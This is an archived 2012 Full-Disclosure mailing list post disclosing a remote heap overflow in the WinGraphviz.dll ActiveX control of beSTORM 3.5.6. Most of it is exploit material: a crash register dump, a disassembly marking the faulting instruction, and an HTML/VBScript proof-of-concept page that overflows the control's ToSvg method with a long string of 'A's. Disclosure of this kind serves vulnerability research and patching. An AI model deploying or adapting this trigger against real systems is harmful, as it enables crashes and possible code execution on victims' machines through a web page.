lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 15 Jul 2012 13:54:20 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: beSTORM ActiveX (WinGraphviz.dll) Remote Heap
	Overflow

Exploit Title: beSTORM ActiveX (WinGraphviz.dll) Remote Heap Overflow PoC
Date: July 15, 2012
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.beyondsecurity.com/
Version: 3.5.6
Tested on: windows 7 SP1
Exploiting the Exploiters
What kind of crappy fuzzer is that ?
==========================================================================
Registers:
--------------------------------------------------------------------------
EIP 01637FFB
EAX 41414141
EBX 01630000 -> 00905A4D -> Asc: MZMZ
ECX 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@...AAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EDI 00000000
ESI 00000000
EBP 0013FD24 -> 0013FD34
ESP 0013FD10 -> 0013FD34


Block Disassembly:
--------------------------------------------------------------------------
1637FE9	CMP DWORD PTR [EAX+10],0
1637FED	JE SHORT 01638042
1637FEF	MOV ECX,[EBP+8]
1637FF2	MOV EDX,[ECX+10]
1637FF5	MOV [EBP-4],EDX
1637FF8	MOV EAX,[EBP-4]
1637FFB	CMP DWORD PTR [EAX],0	  <--- CRASH
1637FFE	JE SHORT 01638042
1638000	MOV ECX,[EBP-4]
1638003	CMP DWORD PTR [ECX+10],0
1638007	JE SHORT 0163801B
1638009	MOV EDX,[EBP-4]
163800C	MOV EAX,[EDX+10]
163800F	MOV ECX,[EBP-4]
1638012	MOV EDX,[ECX+10]


ArgDump:
----------------------------------------------------------------------------
EBP+8	016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@...AAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12	016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@...AAAAAAAAAAAAAAAAAAAAAAAAAA

============================================================================
<html>
Test Exploit page
<object classid='clsid:684811FB-0523-420F-9E8F-A5452C65A19C'
id='fuzzer' ></object>
<script language='vbscript'>

arg1=String(2068, "A")

fuzzer.ToSvg arg1

</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ